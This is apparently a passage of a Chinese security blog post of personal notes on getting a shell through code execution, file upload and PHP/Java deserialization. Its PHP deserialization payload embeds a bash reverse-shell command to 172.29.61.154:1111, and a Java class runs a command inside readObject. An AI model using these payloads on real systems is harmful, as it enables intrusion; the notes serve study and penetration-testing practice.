<h2 id="代码执行"><a href="#代码执行" class="headerlink" title="代码执行"></a>代码执行</h2><h3 id="php-2"><a href="#php-2" class="headerlink" title="php"></a>php</h3><p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808475.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>eval，一句话常用的函数，把括号里面内容按照php代码处理<br>例如最简单的，eval(“system(‘whoami’);”);<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808690.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>个人理解就是可以调用命令执行的函数，从而实现执行一些敏感的系统命令操作，也比较简单，这里再总结下一些常见代码执行函数<br>eval()，assert()，call_user_func()，create_function()，array_map()，call_user_func_array()，array_filter()，uasort()，preg_replace()</p>
<h3 id="java-1"><a href="#java-1" class="headerlink" title="java"></a>java</h3><p>Java.lang.Runtime，Java.lang.ProcessBuilder，Java.lang.UNIXProcess&#x2F;Processlmpl<br>这里从runtime进行分析<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808838.png" srcset="/img/loading.gif" lazyload alt="image.png"><br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808237.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>主要就是看这个exec</p>
<table>
<thead>
<tr>
<th>方法</th>
<th>英文释义</th>
<th>中文释义（非标准）</th>
</tr>
</thead>
<tbody><tr>
<td>exec(String[] cmdarray)</td>
<td>Executes the specified command and arguments in a separate process.</td>
<td>在单独的进程中执行指定的命令和参数。</td>
</tr>
<tr>
<td>exec(String command)</td>
<td>Executes the specified string command in a separate process.</td>
<td>在单独的进程中执行指定的字符串命令。</td>
</tr>
<tr>
<td>exec(String command, String[] envp, File dir)</td>
<td>Executes the specified string command in a separate process with the specified environment and working directory.</td>
<td>在具有指定环境和工作目录的单独进程中执行指定的字符串命令。</td>
</tr>
<tr>
<td>exec(String command, String[] envp)</td>
<td>Executes the specified string command in a separate process with the specified environment.</td>
<td>在具有指定环境的单独进程中执行指定的字符串命令。</td>
</tr>
<tr>
<td>exec(String[] cmdarray, String[] envp)</td>
<td>Executes the specified command and arguments in a separate process with the specified environment.</td>
<td>在具有指定环境的单独进程中执行指定的命令和参数。</td>
</tr>
<tr>
<td>exec(String[] cmdarray, String[] envp, File dir)</td>
<td>Executes the specified command and arguments in a separate process with the specified environment and working directory.</td>
<td>在具有指定环境和工作目录的单独进程中执行指定的命令和参数。</td>
</tr>
</tbody></table>
<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><h3 id="php-3"><a href="#php-3" class="headerlink" title="php"></a>php</h3><p>pikachu中的upload代码有点臃肿，看起来有点费劲，这里选择菜鸟教程<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808239.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>可以看到php中最简单的文件上传，就是通过<code>$_FILES</code>这一参数读取表单中的内容，然后把对应的数值挪到新的目录中</p>
<h3 id="java-2"><a href="#java-2" class="headerlink" title="java"></a>java</h3><p>java上传的马是jsp<br>但是在springboot中，我们需要引入依赖才会解析jsp</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-comment">&lt;!--用于编译jsp--&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.apache.tomcat.embed<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>tomcat-embed-jasper<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">scope</span>&gt;</span>provided<span class="hljs-tag">&lt;/<span class="hljs-name">scope</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808410.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>我认为找文件上传，其实都是要找文件上传的功能点，再看它有没有黑名单白名单，内容过滤什么的<br>所以这里只指出java文件上传的函数<br>Multipartfile，ServletFileUpload</p>
<h2 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h2><h3 id="php-4"><a href="#php-4" class="headerlink" title="php"></a>php</h3><p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808001.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>学习php反序列化，我们就要学习它的魔术方法</p>
<ul>
<li>__construct() 类的构造函数,每次创建新对象时先调用此方法</li>
<li>__destruct() 类的析构函数,某个对象的所有引用都被删除或者销毁时调用</li>
<li>__call() 在对象中调用一个不可访问方法时调用</li>
<li>__callStatic() 用静态方式中调用一个不可访问方法时调用</li>
<li>__get() 获得一个类的成员变量时调用</li>
<li>__set() 设置一个类的成员变量时调用</li>
<li>__isset() 当对不可访问属性调用isset()或empty()时调用</li>
<li>__unset() 当对不可访问属性调用unset()时被调用。</li>
<li>__sleep() 执行serialize()时，先会调用这个函数</li>
<li>__wakeup() 执行unserialize()时，先会调用这个函数</li>
<li>__toString() 类被当成字符串时的回应方法</li>
<li>__invoke() 调用函数的方式调用一个对象时的回应方法</li>
<li>__set_state() 调用var_export()导出类时，此静态方法会被调用。</li>
<li>__clone() 当对象复制完成时调用</li>
<li>__autoload() 尝试加载未定义的类</li>
<li>__debugInfo() 打印所需调试信息</li>
<li>__serialize()，执行serialize()时，先会调用这个函数(这个和__sleep()的区别后面会详细介绍)</li>
<li>__unserialize()，执行unserialize()时，先会调用这个函数(这个和__wakeup()的区别后面会详细介绍)</li>
</ul>
<p>至于getshell，我们写一个存在反序列化漏洞的代码<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808010.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>再构造一个payload</p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs haxe"><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-type">VulnerableClass</span>();  <br><span class="hljs-variable">$a</span>-&gt;data = <span class="hljs-string">&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/172.29.61.154/1111 0&gt;&amp;1&#x27;&quot;</span>;  <br><span class="hljs-variable">$ser</span>=serialize(<span class="hljs-variable">$a</span>);  <br>echo <span class="hljs-variable">$ser</span>.PHP_EOL;<br></code></pre></td></tr></table></figure>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808503.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<h3 id="java-3"><a href="#java-3" class="headerlink" title="java"></a>java</h3><p>java反序列化主要找三个函数<br>readobject，SnakeYaml，XMLDecoder<br>hello-java-sec的我觉得不是很能明显的感受反序列化，这里用别的小例子<br>首先，我们要创建一个对象，并且继承自序列化方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> demo1;  <br>  <br><span class="hljs-keyword">import</span> java.io.IOException;  <br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;  <br>  <br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">HackInfo</span> <span class="hljs-keyword">implements</span> <span class="hljs-title class_">java</span>.io.Serializable&#123;  <br>    <span class="hljs-keyword">public</span> String id;  <br>    <span class="hljs-keyword">public</span> String team;  <br>  <br>&#125;<br></code></pre></td></tr></table></figure>
<p>然后我们可以新建一个对象，并把它序列化成字节序列</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> demo1;  <br>  <br><span class="hljs-keyword">import</span> java.io.FileOutputStream;  <br><span class="hljs-keyword">import</span> java.io.IOException;  <br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;  <br>  <br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">SerializeDemo</span> &#123;  <br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String [] args)</span> <span class="hljs-keyword">throws</span> IOException &#123;  <br>  <br>        <span class="hljs-type">HackInfo</span> <span class="hljs-variable">hack</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HackInfo</span>();  <br>        hack.id = <span class="hljs-string">&quot;suuuu&quot;</span>;  <br>        hack.team = <span class="hljs-string">&quot;suuuu&quot;</span>;  <br>  <br>        <span class="hljs-comment">//将序列化后的字节序列写到serializedata.txt文件中  </span><br>        <span class="hljs-type">FileOutputStream</span> <span class="hljs-variable">fileOut</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">FileOutputStream</span>(<span class="hljs-string">&quot;C:\\Users\\m1371\\Desktop\\serializedata.txt&quot;</span>);  <br>        <span class="hljs-type">ObjectOutputStream</span> <span class="hljs-variable">out</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectOutputStream</span>(fileOut);  <br>        System.out.println(out);  <br>        out.writeObject(hack);  <br>        out.close();  <br>        fileOut.close();  <br>        System.out.println(<span class="hljs-string">&quot;序列化的数据已经保存在了serializedata.txt文件中&quot;</span>);  <br>    &#125;  <br>&#125;<br></code></pre></td></tr></table></figure>
<p>然后我们可以把这个字节序列在输入到别的主机上，从而将字节序列反序列化成对象</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> demo1;  <br>  <br><span class="hljs-keyword">import</span> java.io.FileInputStream;  <br><span class="hljs-keyword">import</span> java.io.IOException;  <br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;  <br>  <br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">DeserializeDemo</span> &#123;  <br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;  <br>  <br>        <span class="hljs-type">FileInputStream</span> <span class="hljs-variable">fileIn</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">FileInputStream</span>(<span class="hljs-string">&quot;C:\\Users\\m1371\\Desktop\\serializedata.txt&quot;</span>);  <br>        <span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">in</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectInputStream</span>(fileIn);  <br>        <span class="hljs-type">HackInfo</span> <span class="hljs-variable">hack</span> <span class="hljs-operator">=</span> (HackInfo) in.readObject();  <br>        in.close();  <br>        fileIn.close();  <br>  <br>        System.out.println(<span class="hljs-string">&quot;反序列化恢复字节序列为对象...&quot;</span>);  <br>        System.out.println(<span class="hljs-string">&quot;Name: &quot;</span> + hack.id);  <br>        System.out.println(<span class="hljs-string">&quot;Address: &quot;</span> + hack.team);  <br>    &#125;  <br>&#125;<br></code></pre></td></tr></table></figure>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808302.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>那么怎么样的反序列化才能rce呢，这里我们只需要对第一个文件进行一下修改</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> demo1;  <br>  <br><span class="hljs-keyword">import</span> java.io.IOException;  <br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;  <br>  <br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">HackInfo</span> <span class="hljs-keyword">implements</span> <span class="hljs-title class_">java</span>.io.Serializable&#123;  <br>    <span class="hljs-keyword">public</span> String id;  <br>    <span class="hljs-keyword">public</span> String team;  <br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">readObject</span><span class="hljs-params">(ObjectInputStream in)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;  <br>        in.defaultReadObject();  <br>        Runtime.getRuntime().exec(<span class="hljs-string">&quot;calc.exe&quot;</span>);  <br>        &#125;  <br>&#125;<br></code></pre></td></tr></table></figure>
<p>这时候我们再序列化，再反序列化，就能实现rce</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="category-chain-item">渗透测试</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/getshell/" class="print-no-link">#getshell</a>
      
        <a href="/tags/top10/" class="print-no-link">#top10</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>getshell手法小记</div>
      <div>https://www.susec.xyz/2024/11/11/getshell手法/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suuuu</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年11月11日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/11/11/Shiro/" title="SHIRO">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SHIRO</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/11/11/Raven2/" title="vulnhub靶场-Raven2">
                        <span class="hidden-mobile">vulnhub靶场-Raven2</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
